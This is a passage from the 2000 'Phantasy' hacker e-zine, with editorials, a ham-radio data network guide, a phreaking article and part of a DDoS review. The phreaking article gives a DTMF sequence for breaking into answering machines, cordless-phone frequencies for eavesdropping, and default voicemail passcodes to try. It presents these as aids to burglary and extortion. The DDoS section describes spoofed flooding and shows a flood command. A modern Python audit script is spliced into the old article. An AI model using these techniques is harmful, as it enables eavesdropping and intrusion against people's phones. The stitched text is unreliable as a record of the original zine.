Phantasy Issue 24 Vol 08
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
= =
- WELCOME TO THE TWENTY-FOURTH ISSUE OF -
= =
- -=>PHANTASY<=- -
= =
- A PUBLICATION AND NEWSLETTER OF -
= =
- THE -
= INTERNATIONAL =
- INFORMATION -
= RETRIEVAL =
- GUILD -
= =
- Hacking, Phreaking, Anarchy, Survivalism, and Commentary -
= =
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Volume Number Eight - Issue Number Twenty-Four - Dated 03/17/2000
Editor-In-Chief is Mercenary : iirg@iirg.org
Staff Writers Are: Thomas Icom : ticom@iirg.org
Black IC : black_ic@iirg.org
---------------------
Table of Discontents:
---------------------
 #  Selection                              Author
 -  ------------------------------------   ----------------
 1. Legal Ease & IIRG Information          The IIRG
 2. The Myth of the "White Hat Hacker"     Mercenary/IIRG
 3. How To Set Up an Underground
    Wireless Data Network - Part I         Thomas Icom/IIRG
 4. Basic Phone Security                   Mob Boss
    Making and Breaking It
 5. "Tribe Flood Network 3000"             Mixter
    A theoretical review
 6. The Nazi Files (Stories of the SS)     The IIRG
 7. IIRG Signal Intelligence               Black IC/IIRG
    (SIGINT) Guidelines
 8. The Rumor Mill                         Anonymous Sources
 9. FREE the FISH                          Mercenary/IIRG
10. Letters to the IIRG                    N/A
11. IIRG and Phantasy Distribution         The IIRG
12. Articles We Never Want to See          Author Unknown
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [1]: Legal Ease & IIRG Information
OFFICIAL DISCLAIMER...
All Contents of PHANTASY Magazine are (C) Copyright by THE IIRG, all
rights reserved. Nothing may be reproduced in whole or in part without
written permission of the IIRG.
Phantasy Magazine may also NOT be included on any CD-ROM collection
without express written permission of the IIRG.
All information published in PHANTASY is from USER contributed material.
The Publishers and Editors of PHANTASY and THE IIRG disclaim any liability
from any damages of any type that the reader or user of such information
contained within this newsletter may encounter from the use of said
information. All files are brought to you for entertainment purposes only!
We also assume all information infringes no copyrights and hereby
disclaim any liability.
In the future PHANTASY Magazine will be made available quarterly to the
Internet community free of charge. Any corporate, government, legal,
or otherwise commercial usage or possession (electronic or otherwise) is
strictly prohibited without written IIRG approval, and is in violation of
applicable US Copyright laws.
The IIRG (IIRG Mailing Address)
862 Farmington Avenue
Suite 306
Bristol, Connecticut 06010
Here is the IIRG's Public Key:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [2]: The Myth of the "White Hat Hacker"
By: Mercenary <iirg@iirg.org>
The White Hat Hacker does not exist. I propose that this classification
is a myth. This can be proven with a definition, a brief analysis of why
the term was created, and why this ridiculousness is still flung around
in the media and hacker communities.
First, let's look to see what the term "Hacker" means.
The term "hacker" has been misused by the media since the mid 1980's.
True Hackers are totally different people than what we have been represented
as. One of our main ethics is to allow no harm to come as a result of our
actions. For our purposes here, I will refer to "True Hackers" as
"Classic Hackers".
Classic Hackers are explorers, individuals whose sole interest is
learning as much as possible about the electronic systems that fascinate us.
Some hackers might take excursions into other computer systems, but
Classic Hackers take the utmost care to disturb nothing.
A Classic Hacker's goal is not destruction, nor profit, nor revenge.
Our goal is the pursuit of knowledge and the pursuit of conquest.
A Classic Hacker believes that information should be free, and that pushing
the envelope of what is possible should be a daily occurrence.
We believe that every system is ripe for improvement, whether the
system is a computer, a program, a set of traffic lights, or a government.
The term "White Hat Hacker" is a self-proclaimed title of the Hacker
turned businessman. It is a term created in an attempt to justify
selling out to the business community.
The most classic example of this is the "L0pht".
If we look at their FAQ from 1998 we will see that they defined
themselves as "just a bunch of hackers who got together and started
working on projects together". They also claimed that "We're not in
this for the money, or the glory".
But as is the case with many former hackers, MONEY is the deciding
factor when push comes to shove. As we can see in their latest FAQ
they totally disregard their roots and now claim "We strived to be
(and achieved) a pure R&D environment. Unfortunately pure research
and development is not a very profitable arena."
Of course hacking is not profitable. Nobody ever said it was.
Unless you cross the line and become an actual "criminal", you
can expect to make nothing off your activities.
I have no problem with Hackers switching to security consulting.
But if you become a security consultant, you are no longer a Hacker.
By attempting to label yourself as a "White Hat Hacker" you are
just trying to gain your acceptance to possible customers (victims).
Security consultants are businessmen first and foremost, and they
know their prey well.
Can you see the pattern?
A security consulting firm's job is not to protect your company,
a security consulting firm's job is to make money selling protection to
you from demons, real or imagined.
In plain words, when they are working for you they are working for
themselves and this is the case in the entire free market world.
The security consultant title is designed to facilitate the deception
that if you have enough money, someone will take care of your problem
rather than you learning how to solve your own security issues.
Now I am sure you have heard by now that the government is waging a
major propaganda war against the on-line hacker community with the help
of the socialist media.
The government and the media are experts on psychology, psychological
warfare, and brainwashing. Between the two groups they know more about
the human mind and behavior, and how to control both.
The anti-hacker movement's main propaganda themes seem to be that
(1) Hackers are the root of all on-line evil.
(2) That the government, (through more restrictive legislation)
is the business community's only hope against the spreading
plague of computer crime.
To understand the anti-hacker movement, we must understand what
propaganda is.
Simply put, propaganda can be outright lies, distorted facts, and/or
truth, combined to change a person's thoughts on a subject.
Now it has been known for some time by the Central Intelligence Agency
that countries such as Russia and China are developing tools to attack
commercial computer networks.
Even FBI Director Louis Freeh says that we face a "very serious" espionage
threat from China. Organized Chinese fraud rings on the mainland and overseas
are hacking databases to compromise credit and identity details.
"The Chinese gangs have moved into the electronic age where they're using
hacking techniques and Internet theft," US Secret Service Special Agent
Gregory Regan explained in testimony before the Senate Judiciary
Subcommittee on Technology, Terrorism and Government Information.
Yet with these undeniable allegations by the government's own lackeys,
Janet Reno wants to go after the so-called "evil 15 year old hackers",
when it looks like they should have their sights targeted elsewhere.
What makes this all so much worse is that the "White Hat Hackers" who
once claimed that "We're not in this for the money, or the glory" are
testifying before the Senate and strolling up to every TV camera they
can find supposedly speaking for a community they actually have no
part in anymore.
The main problem with the media is that they glorify what I like to call
"hacking misfits". The only hackers, crackers, or script kiddies who get
glorified by the media are those who messed-up and got caught.
The media loves the term "White Hat Hacker", it lets them put across
the propaganda of community cannibalism.
Hackers turn against their own kind.
Let's get the story right folks, these are not hackers, they are paid
Security consultants out to make money selling protection to you for
something you could easily correct yourself.
If you have problems with a "hacker", it's not a Classic Hacker.
You have a computer criminal on your hands.
Hackers do not brag in public IRC channels. Hackers do not testify in
front of Senate committees. If you've been hacked by a "Classic Hacker"
and he's done it right - you'll never even know it.
So let's get the terminology straight.
1. Security Consultant - what former hackers become when they sell
out their ideals and community.
2. Computer Criminal - anyone who uses a computer for monetary gain
or illegal activity resulting in damage.
3. White Hat Hacker - no such animal or mammal.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [3]: How To Set Up an Underground Wireless Data Network - Part I
By: Tom Icom <ticom@iirg.org>
Introduction
============
Sending data over the airwaves actually predates the Internet. Back in
the 60s, Hams were using a 5-bit code known as Baudot to communicate over
HF amateur bands. The devices used were large electromechanical affairs
known as Teletypes, and ran at speeds of 45 and 75 baud. Baudot is still
used on HF, along with ASCII running at 110 and 300 baud, and other more
modern digital modes such as AMTOR and PSK. Back in the late 80s, Packet
Radio made its appearance running AX.25 (a ham radio version of X.25 used
by packet switched networks) at 300 and 1200 baud. Hams set up a massive
AX.25 digital network stretching on the east coast from Maine to Florida
and inland to the Mississippi River.
The rise of the Internet, however, caused the decline of packet
radio's popularity. Packet radio requires an amateur radio license, where
the Internet does not. Packet Radio's top speed for the average end user
is generally limited to 9600 baud, with 1200 baud being most common. The
average Internet user comes in at 56K baud over the phone lines, and
faster if they use a cable modem. Packet radio requires more technical
expertise to get up than Internet service. This is all beyond the means
and intelligence of the average DOS/Exploit/Script "hacker", whose main
concern appears to be acting his sexual frustrations out on random
computer systems.
Certain "white hat hacker" groups (AKA - Security Consultants)
have been attempting to implement a wireless "underground" network.
This has been unsuccessful to date because of their insistence of wanting
a wireless high speed TCP/IP backbone with a ton of superfluous bells and
whistles as the foundation of their network, legal issues with accessing
the Internet via the Amateur Bands, short range and high cost of Part 15
wireless networking devices, and a general lack of serious interest among
many of the "hackers" they recruit. With many "white hats" now doing
infosec for corporate interests in a blatant manner, one must begin to
wonder just how "underground" such a network would be if implemented.
Other hobbyist organizations have implemented wireless Internet on a
small scale in their locales. While this is all fine and dandy, I don't
consider them underground networks due to the fact that they are operating
in a totally overt manner and are connected to the Internet. Let's face
it. The Internet is great for downloading technical and product support
information, emailing friends and family, expanding one's non-computer
hobbies, and getting the latest news and weather. As the basis for an
underground network it quite frankly sucks, and I fully expect the Feds to
step in and muscle more restrictions on it in the future. It is happening
in the same way it started with our Second Amendment rights,
highly-publicized incidents followed by a call to action by the "experts".
If you're looking to be able to surf the web, and download megabyte
multimedia files in 30 seconds while at the beach for only $19.95 +
shipping and handling FORGET IT. If you want to be a part of an effective
wireless underground network, then I will show you how, and it will work.
The equipment is inexpensive, and is available off the shelf at any
business that sells amateur radio equipment. The cost of the equipment can
be as little as $200 per station PROVIDED you are willing to expend the
effort to do so. Battery-operated stations are capable of being fitted into
a .50 caliber military surplus ammo can with a solar powered trickle
charger, and placed on a remote hilltop to act as relay stations for
months of unattended operation. While this network does not have
indigenous encryption, it will support the encryption system of your
choice. This, like other aspects of the network, allows you to customize
specifics to suit your needs, thus increasing OPSEC (operational
security). I'm of the belief that telling the world what type of
encryption you're using only gives your enemies one more thing with which
to screw you. While it may be fine and dandy for the white hat
hackers and academic idiots to allow themselves to play with each other's
crypto, we are simply interested in good COMSEC (Communications Security).
There is plenty of information out there as to what works and what
doesn't. If you decide to use a Caesar cipher on your system you have no
one to blame but yourself.
Equipment
=========
You will only need the following to get up and running. You will need
a radio. Most people acquire a 2m/70cm dual-band ham HT that has been
modified for out of band use. These radios typically have a maximum power
output of five watts over a frequency range of 140-174 and 420-470 MHz.
You may also upgrade to a base/mobile unit which offers a power output of
25-50 watts depending on the make and model. You will need a Terminal Node
Controller. This is a 1200 baud AX.25 radio modem that interfaces between
your terminal and your radio. You will need an RS-232 terminal. You can
use anything that has an RS-232 port; PC, Mac, C64, Atari, or even an old
DEC VT-100 terminal if that's what you have. All the work is done via the
TNC. You will need some sort of antenna system. All HTs come with a stock
rubber duck antenna, but you should upgrade to at least a home-built
dipole, 1/4 wave vertical, or j-pole antenna. With a good antenna, even
running 5 watts will give you decent range. You will need a 12 volt power
supply. For a little 5 watt HT you can get by with your basic 3 Amp Radio
Shack supply. A 50 watt mobile will require a larger 20 Amp supply such as
an Astron or similar make. Hooking all this stuff up is relatively
simple. Specific instructions will be included with the equipment you
purchase, but will be along these lines:
 \|/ Antenna       /-----------------------+----------Power Supply
  |                |                       |
  |        +--------------+             /-----\
  | Coax   |              |-Speaker-----|     |         Computer Running
  \-Cable--|    Radio     |-Mic Audio---| TNC |-RS-232--Terminal Program
    Feed   |              |-Mic PTT-----|     |
           +--------------+             \-----/
Not too difficult, is it? THAT is the foundation of the IIRG's
network NEWNet: New England Wireless Network, and that's all you need in
order to get access. With this simple set-up, you have the capability of
both maintaining a local commo net with your group, and integrating with
larger networks consisting of other groups in your region.
In future issues of Phantasy, I will be detailing more of the nuts,
bolts, hints and kinks involved in setting up a functional underground
wireless digital communications network. Comments and questions can be
emailed to ticom@iirg.org and there is also a room dedicated to this
purpose up on our telnet BBS PFTE (telnet: luna.iirg.org uid:BBS no p/w).
======================================================================
Thomas Icom, IIRG - <ticom@iirg.org>
International Information Retrieval Guild, "May Odin guide your way!"
<http://www.iirg.org/~ticom/> VMB: 877-570-5970 x570
======================================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [4]: Basic Phone Security - Making and Breaking It
By: Mob Boss <mafia_man777@ureach.com>
The other day I was sitting in class and I was bored out of my head so
I picked up a dictionary. I was curious to see how a hacker was defined,
considering that seems to be one of the most passionately fought arguments,
good against evil, hackers against crackers.
I found the definition to be "A computer enthusiast, someone who breaks
into computers". Not surprising, but when I went to look for "Phreak" and
"Phone Phreak", lo and behold, it was not there. This seems to be common
these days. Everyone is shaking in their boots about big, bad, evil hackers
and what might happen to their home or business computer, but no one ever
stops to think about the phone system.
This article is not geared towards anyone specific, in fact this is just
an abstract to guide all those who are interested in general security,
privacy, and H/P. Whether you're a small business owner, a homemaker, or an
executive, there is something here that you should know, if you don't
already.
Phone Phreaking can be loosely defined as the exploration and exploitation
of the phone system and everything that goes along with it. Back in the 60's
and 70's there was blue boxing, back in the eighties and early nineties there
was red boxing, but nothing compares to the things that are here now, in the
early part of the 21st century. Seems everything is hooked up to the phone
system one way or another these days.
People are sporting voicemail, pagers, cell phones, home answering machines,
fax machines, computers hooked up to the internet, cell phones hooked up to
the internet, and there are plans to have cars on the internet pretty soon
as well, (i.e. 2600 issue 16:4, I OWN YOUR CAR).
1984 is here, just a little late.
Now considering all that, why would someone ignore learning about the phone
system, considering the whole backbone of telecommunications is the phone
system? That's a mistake a lot of companies and individuals make.
Besides theft of phone service, as there are so many legal ways to make a
free call these days, but how about privacy? How would you like someone
monitoring your business via the voicemail system or maybe monitoring your
house by using the remote access feature on your answering machine to
actually listen in on what's going on? How about someone tapping your analog
cell phone or old cordless phone?
Now from the attacker's point of view, what better way to watch a target?
You want to break into a computer network, monitor the voicemail systems for
possible technical information and logins. You want to break into a house,
listen to messages on the answering machine to find out the patterns of
those who reside there. Want to blackmail, extort, and steal, well then
there are tons of possibilities for you.
Let's start at home. What communication devices do you own?
Cordless phone, PC, Fax machine, answering machine? I'm willing to bet you
have at least one or all of those items in your home. First I will touch on
answering machines, personally I could live without it. Most people hate
talking on answering machines, and when it's not meant to be it's not meant
to be. But I still own one and the first thing I did when I learned about
breaking into answering machines was to check my manual to see if my machine
had remote access. As it turned out, it did have remote access but lucky for
me it has a strong security policy, two bad tries will boot you off, plus the
code is a good one. Now machines I have encountered in businesses
and homes were as easy as dialing 123 after the tone.
So what, you say? You have nothing to hide? Well privacy is privacy and
either way I don't want some thug hearing when I'll be at the dentist or
vacation. This is twice as bad if you're a business and you have customers
leave orders on the phone after hours.
Credit card fraud has been booming since the 1980's and two decades later
it's still a problem, and it's a safe bet that it always will be a problem.
Here is an easy to follow system for getting into an answering machine, out
of the many techniques I have read, tried, or heard of this one is the most
rewarding...
after the tone start dialing this sequence,
9876543210000123456789 then 2000, 3000, till you hit 9000, then
1111, 2222, and so on till you hit 9999.
That technique will break into answering machines in the homes of
government officials, mail order stores, and places that should be more
secure. Try that on your machine or a friend's (with his permission of
course) and see how secure that answering machine really is.
Another problem that has been around for many years is that of people
tapping cordless phones with simple frequency scanners. Now this problem
has been dying out but when I flip on the Ol' Bearcat I still hear morons
yacking away on their old, ten dollar, garage sale, cordless phones.
These aren't wholesome conversations either. Drug deals, phone sex, and
fights. I guess it all depends on where you live but just the same there
are a lot of possibilities here. Like I said, this is not a new problem,
but it's still widespread even though a whole decade of cordless terror
has gone by.
By programming the following frequencies into your scanner
you'll hear many conversations:
Channel  Base (MHz)  Handset (MHz)
1 43.720 48.760
2 43.740 48.840
3 43.820 48.860
4 43.840 48.920
5 43.920 49.000
6 43.960 49.080
7 44.120 49.100
8 44.160 49.160
9 44.180 49.200
10 44.200 49.240
11 44.320 49.280
12 44.360 49.360
13 44.400 49.400
14 44.460 49.480
15 44.480 49.500
16 46.610 49.670
17 46.630 49.845
18 46.670 49.860
19 46.710 49.770
20 46.730 49.875
21 46.770 49.830
22 46.830 49.890
23 46.870 49.930
24 46.930 49.990
25 46.970 49.970
Obviously you want to listen into the base frequencies so that you hear
both sides of the conversation. Now you may say well I don't have an old
phone, "I have a brand new cordless phone that runs on the 900 MHz band
and scrambles the conversation".
The only thing I have to say to that is, what if your business partner,
mistress, and/or accomplice are using an old cordless phone, then your
security measures mean nothing and it's out there. That's why you have to
analyze security from afar, missing the big picture will really screw you up.
Are you running a dialup server at your residence or small business?
If you think it's safe because no one but you had the dialup then you my
friend are dead wrong. For years people have been using programs called
war dialers (i.e. ToneLoc) to scan exchanges looking for computers and just
because times have changed and the internet seems to dominate all doesn't
mean that people have stopped looking to their local exchanges either.
In fact much can still be found by having a war dialer go for a few hours
and attackers know this. A company can have a big fancy firewall but a
dialup sticking out like a sore thumb a few numbers up from their main
switchboard number. That kind of ignorance can be very, very costly and it
would be wise to see how your computers are set up. If a dialup server is
necessary be sure to pick strong passwords and keep up with a good policy
for protecting that data, physically and remotely.
Let's move on to your small (or large) business.
Most businesses worth anything at least have a small PBX and voicemail
system, plus the kind of stuff you may have at home, as all the same
rules of home security apply at the office as well. It's very important that
a person takes his sweet time with setting up the phone system, baby it just
as much as you would the computer network because leaving the phone system
open will lead the path to your precious network.
If someone gets into your phone system what do you have to lose?
Privacy, valuable information about customers (credit card information),
use of your lines to call Europe and what not.
I must say that PBXs are more challenging now than they were ten years ago
but considering most voicemail systems run hand in hand with the PBX,
having weak passcodes on your voicemail system can lead to exploitation of
your PBX services. Meridian Mail, which is put out by Nortel (www.nortel.com),
for instance has a nice little feature where you can set the operator
assistance number, which in what I have seen is local numbers, just the same
it can be useful for bouncing through to avoid tracing. I don't think
anyone wants their phone system used as a jumping off point for attack
against something big. The same rules of breaking into answering machines
apply to voicemail, but one can get more creative here.
There are usually multiple accounts on a system so if you can't get into one,
move onto another. 999 or 9999 is usually an administrator's box and 100 or
1000 is usually a general delivery box. It's been my experience that the
general delivery box can be the most influential as that's where your
general information can be obtained and that's also a very easy box to get
into, a lot of the time the passcode is just 1000. In general though some
passcodes to try are the number of the box as the passcode, 1234, 1111 to
9999, 1000 to 9000, the name of the person or company in DTMF, and the last
four digits of the phone number. Knowing that, it's possible to use these
private phone networks for a lot of different things and I think it's very
clear why someone should take this into
consideration.
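The passcode habits listed above are the ones a voicemail administrator should refuse when a mailbox is set up. The following Python audit is an added example, not part of the original article or of any vendor's software; the mailbox records, names and phone numbers are constructed, and the minimum-length and sequential-digit checks go slightly beyond the article's list.

```python
# Added example: flag the weak voicemail passcodes the article lists.
# All mailbox data below is constructed for illustration.

MIN_LENGTH = 4  # assumed site policy, not taken from the article

# Standard telephone keypad letters, used to spell a name in DTMF digits.
KEYPAD = {"2": "ABC", "3": "DEF", "4": "GHI", "5": "JKL",
          "6": "MNO", "7": "PQRS", "8": "TUV", "9": "WXYZ"}
LETTER_TO_DIGIT = {ch: d for d, letters in KEYPAD.items() for ch in letters}


def name_to_dtmf(name):
    """Spell a name on the keypad, skipping anything that is not a letter."""
    return "".join(LETTER_TO_DIGIT[c] for c in name.upper() if c in LETTER_TO_DIGIT)


def weak_reasons(passcode, box, phone="", names=()):
    """Return every reason a passcode is weak; an empty list means none found."""
    if not passcode.isdigit():
        return ["not all digits"]
    reasons = []
    if len(passcode) < MIN_LENGTH:
        reasons.append("shorter than %d digits" % MIN_LENGTH)
    if passcode == box:
        reasons.append("same as mailbox number")
    if len(set(passcode)) == 1:
        reasons.append("single repeated digit")          # 1111 .. 9999
    if passcode[0] != "0" and len(passcode) > 1 and set(passcode[1:]) == {"0"}:
        reasons.append("digit followed by zeros")        # 1000 .. 9000
    steps = {int(b) - int(a) for a, b in zip(passcode, passcode[1:])}
    if steps in ({1}, {-1}):
        reasons.append("sequential digits")              # 1234, 9876, ...
    phone_digits = "".join(c for c in phone if c.isdigit())
    if phone_digits.endswith(passcode):
        reasons.append("last digits of phone number")
    for name in names:
        spelled = name_to_dtmf(name)
        if spelled and spelled.startswith(passcode):
            reasons.append("spells '%s' on the keypad" % name)
    return reasons


# Constructed mailbox table: box number, passcode, and what is known publicly
# about the owner (phone number, personal and company names).
MAILBOXES = [
    {"box": "1000", "passcode": "1000", "names": ("General",)},
    {"box": "9999", "passcode": "9999", "names": ("Admin",)},
    {"box": "2315", "passcode": "2263", "names": ("Acme", "Jones")},
    {"box": "2316", "passcode": "0142", "phone": "860-555-0142"},
    {"box": "2317", "passcode": "1234"},
    {"box": "2318", "passcode": "583920", "phone": "860-555-0199",
     "names": ("Smith",)},
]


def audit(mailboxes):
    """Map each mailbox with a weak passcode to the reasons it was flagged."""
    findings = {}
    for m in mailboxes:
        reasons = weak_reasons(m["passcode"], m["box"],
                               m.get("phone", ""), m.get("names", ()))
        if reasons:
            findings[m["box"]] = reasons
    return findings


if __name__ == "__main__":
    for box, reasons in sorted(audit(MAILBOXES).items()):
        print(box, "->", "; ".join(reasons))
```

The same checks belong in the passcode-change path, together with a lockout after a small number of bad tries like the one described for the answering machine earlier.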
Ok, now that it's clear that your everyday conversations are at risk, let's
talk about some of the ways we can ensure that our distant party is the
only other person to hear the conversation. Remember the only secure
conversation is one in person, free of any monitoring. Getting back to the
point, one must consider what level of security is needed for a conversation
before they begin to put security measures in place. For instance I doubt
you need to encrypt a voice conversation with your grandmother (unless she
works for a three letter agency) nor do I think you want to be on that old
cordless phone while buying arms from third world terrorists (not that I'm
advocating that). Let's say you are interested in securing voice
communication, here are some ideas on what you can do to protect your
privacy. The first method is accomplished through PGPphone, a nice little
program from the makers of PGP (Pretty Good Privacy). This program allows
for secure modem to modem or tcp/ip based voice communication. Using PGP keys
at the strength preselected the conversation can be encrypted and secured
from prying ears. Only drawback is that there is a little bit of lag and the
stronger the key, the more static and breakup you will get. Another idea for
shaking any taps on your phone line or your counterpart's phone line is
through the use of a number of payphones. If you keep a good list of payphone
numbers in your area that allow for incoming calls you can be at a certain
payphone at a preselected time to receive that call. If it's busy you can
always have a backup payphone not too far away or your contact will simply
try back every two minutes. In my area at least there are still some
neighborhood COCOTs (customer owned coin operated telephone) that still take
in calls. Your best bet is to call a voicemail number that has ANI every
time you're at a payphone. When you get home call all the payphone numbers you
accumulated and see which ones take in calls. Some owned by the Telco will
not allow the call to go through, some COCOTs will have a modem pick up.
As another approach you could always invest in one of those expensive
communication devices that hook up to the telephone and allow you to call
another telephone with the device. The price is definitely a drawback
($500 area) so using one of the less expensive methods is most likely the
best way to go. Be creative and use your common sense, doing that
you'll come up with many creative ideas.
This was meant simply as a primer to phone security. Yes these are old
problems but they needed to be retouched on because it seems many people are
still mystified by simple phone phreaking techniques. There are other phone
risks, such as beige boxing and social engineering, but those topics have
been covered already in some very well detailed articles that are available
on sites all over the internet and fine BBSs like Ripco. I hope this has
opened your eyes to the dangers out there or at least refreshed your memory.
And to cut off all those flames that I ripped this information off and what
not, I have spent many hours on the phone testing and perfecting these
techniques, there is nothing here that I don't have first hand knowledge of.
I'd like to leave off with these words that a good friend recently told me,
"When you take from one it's plagiarism, but when you take from many it's
research."
Appendix
PGPphone
http://web.mit.edu/network/pgpfone/
Phreaking Info http://come.to/mobdomain
http://www.phonelosers.org
http://www.hackersclub.com/km
-The Mob Boss; http://come.to/mobdomain
Voicemail and fax: 1-877-203-3043
Special Thanks To...
Deo
Ryan
Websulker (http://www.websulker.com)
and anyone else I left out...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [5]: "Tribe Flood Network 3000": A theoretical review
By: Mixter <mixter@newyorkoffice.com>
-----BEGIN PGP SIGNED MESSAGE-----
"Tribe Flood Network 3000": A theoretical review
of what exactly Distributed DOS tools are, how they can be used,
what more dangerous features can be implemented in the future, and starting
points on establishing Network Intrusion Detection Rules for DDOS.
Many technically uninformed people consider DDOS as a weapon, that should not
be publicly evolved and distributed. This is the only further thing I'll be
releasing to explain DDOS tools, comprehensible for EVERYONE, and future
features that may be implemented in DDOS: a brief theoretical description.
BTW: People with technical knowledge may skip over most of the stuff in I. and II.
I. What is distributed DOS, what can it be used for, how does it operate?
II. What are DDOS features, what are future DDOS features, how is DDOS evolving?
III. DDOS, an exploit or not? Should it be published? What is the main problem?
IV. How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?
I.
What is distributed DOS?
Distributed DOS, like any distributed concept, will make it easy to coordinate
a procedure that is launched from many computers. In this case it is Denial
Of Service in form of packet flooding, to overload network links.
DDOS IS NOT A HACKING TOOL CATEGORY. Distributed DOS tools are PENETRATION
tools. They do not exploit security vulnerabilities, but they can demonstrate
what amount of traffic a host can or cannot handle. Distributed DOS has been
used a long time by professional security consultants for penetration testing.
Before there were DDOS attack tools, there have been commercial, non-open-source
programs out that could launch distributed packet floods. Those were used in the
information security consulting business, to perform a security service called
"Capacity Management". The purpose of Capacity Management is to determine how
much traffic a network can handle, to see if the target's bandwidth has to be
improved, or if it can handle enough traffic while providing service reliably.
What can it be used for?
It can overload, or flood if you want, network links. It sends meaningless
packets, the overall amount of data being more than the network can process.
The impact is that the targets can not be reached over a network. That is all.
How does it operate?
The basic concept is that you install a huge amount of DOS servers on different
hosts. They will await commands from a central client. A central client can then
message all the servers, and instruct them to send as much traffic as they can
to one target. The tool distributes the work of flooding a target amongst all
available DOS servers, therefore it is called a distributed concept.
Before these tools were available, an attacker (or penetration tester) would
have to telnet into all the hosts that he wanted to use, log in as a user,
and manually launch a command to flood a target on each of the hosts that
should flood, for example using the UNIX standard tool ping: 'ping -f target'
II.
What are DDOS features?
The actual attack tools don't do simple flooding, but variations of it which
involve using actual weaknesses in a protocol to a) make an attack more
powerful b) make an attack harder to track back. First, current DDOS tools
spoof source addresses. They are sending raw IP packets, and due to the
nature of the internet protocol the source addresses can be fake ones, and
single (not connection oriented) packets will still reach their destination.
This is basically what makes backtracking of the attacks so hard. DDOS also
exploits protocol weaknesses; for example, it can open up half-open
TCP connections by SYN flooding. This is a very old and well known protocol
vulnerability, and feasible countermeasures are present. To make attacks more
powerful, DDOS can generally use any protocol vulnerability that can be
exploited by sending single, not connection oriented packet traffic to a host.
What are future DDOS features?
Things that can still be implemented, but have not in publicized tools,
are protocol vulnerabilities as mentioned above. One of those is the "stream"
attack (discovered by Tim Yardley, stream.c and spank.c demonstrate the
vulnerability and are public). Stream attack sends TCP packets with either
ACK or both SYN and ACK flags set. Because they are not part of a connection,
they will "confuse" a target machine and take some time to be processed by
the operating system. If this attack is used in a distributed way, the attacker
can overload machines with fewer hosts. From what I've heard, distributed stream
attack IS already implemented in private DDOS tools. It is very trivial to
implement this feature. A second possibility that is not implemented yet is
multicast addresses. Multicast addresses are routed (forwarded) specially by
routers, they can multiply one packet into several ones. The concept would be
to send out packets with a multicast (224.x.x.x) source. A target could send
an error message back to multicast destinations, and multiply the bandwidth.
This concept has also been mentioned by Tim Yardley. Another concept could
be to purposefully send special strings in the flood traffic, strings that
Intrusion Detection Systems (IDS) could falsely interpret as break-in attempts,
the impact would be false alarms and affected IDS could get overloaded or crash.
How is DDOS evolving?
As I mentioned, the first tools that did distributed denial of service were
commercial penetration tools. The origin of using general DOS is certainly
IRC (Internet Relay Chat), where kiddies can take over control of channels if
they temporarily take out computer systems with DOS. The first packet flooding
DOS that involved multiple servers flooding was "smurf". Smurfing relied on
mis-configured networks replying back to a broadcast address, sending one
packet would result in hundreds bouncing back. Then, most of those networks
were fixed, and attackers compromised a lot of hosts, preferably hosts with
high bandwidth, and started flooding manually from them. Because this took
a lot of time, attackers wrote servers which they installed on the hosts
they had compromised. They no longer needed to log in, but only message those
servers. The DDOS attack tools I know of are, in chronological release order:
fapi (private, by ?), blitznet (public, by phreeon), trinoo (private, by
phifli), TFN (public, by me), stacheldraht (private, by randomizer), shaft
(private, by ?), TFN2K (public, by me), Trank (TRinoo + spANK.c?, private).
The recent development has also continued in other ways, since people were
monitoring traffic for very DDOS-program-specific traffic (like known character
strings, known passwords, default ports), there have been many small variations
made to the code of the above tools, by attackers, to prevent being detected.
III.
DDOS, an exploit or not?
No. DDOS itself is not an exploit. It just makes an existing concept more
easy. Take the distributed.net RC5 challenge and distributed password crackers.
They are not exploits. But they are exposing a weakness, that many passwords
can be brute forced faster than people think. DDOS shows that many networks
are not as strong as they seem to be and can be overloaded faster than people
used to think. Additionally, there are actual exploits implemented in DDOS
exploits, that exploit security holes in network protocols currently used
on the Internet. These security holes must not necessarily be exploited to
make DDOS possible, but they do make the impact of DDOS attacks more powerful.
Such exploits are the possibility of arbitrarily spoofing IP addresses, SYN
flooding, IP stack attacks with bad fragmentation, header offsets and other
"magic packets", the stream vulnerability, and missing authentication and
security of traffic known as connection-less or stateless.
Should it be published?
That is for you to decide. It is your personal opinion. But people will
continue to publish vulnerabilities. Hundreds of talented security analysts
are professionally researching vulnerabilities in software, and posting
exploit programs, which can often be used to instantly compromise a system
running the vulnerable software at root level. The past has shown, that since
security vulnerabilities were a problem on the internet, people have been
ignoring advisories containing only the information THAT something was
vulnerable to an attack, disregarding them as being "completely theoretic".
Only when people wrote up and posted ready-to-(ab)use vulnerability
exploits, the severity of vulnerabilities became clear, and people would
make an effort to counter those vulnerabilities.
What is the main problem?
The main problem, that made attacks against sites as big as yahoo.com
possible, is the bad overall security on the internet. With ONLY a DDOS
tool in his hands, Joe Attacker cannot do anything. But security vulnerabilities
are omni-present on the majority of hosts on the net. An awful lot of these
hosts are not caring about their security, as a result they are running
software that is KNOWN to be vulnerable, and against which public exploit
programs exist. An attacker has only to run one of the public exploit programs
and he is granted full access to such hosts. And various people have been
able to compromise THOUSANDS of hosts with well-known, old vulnerabilities.
Even high speed university networks, which originally built the foundation
of internet architecture have proven to be insecure. With full control over
thousands of hosts, it is easy to concentrate all of these hosts' resources,
and to be able to attack almost anything on the internet.
IV.
How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?
The mistake everyone has been making is to search for default strings of
special DDOS tools, for default values, ports, passwords, etc.
To establish Network Intrusion Detection capability in order to spot these
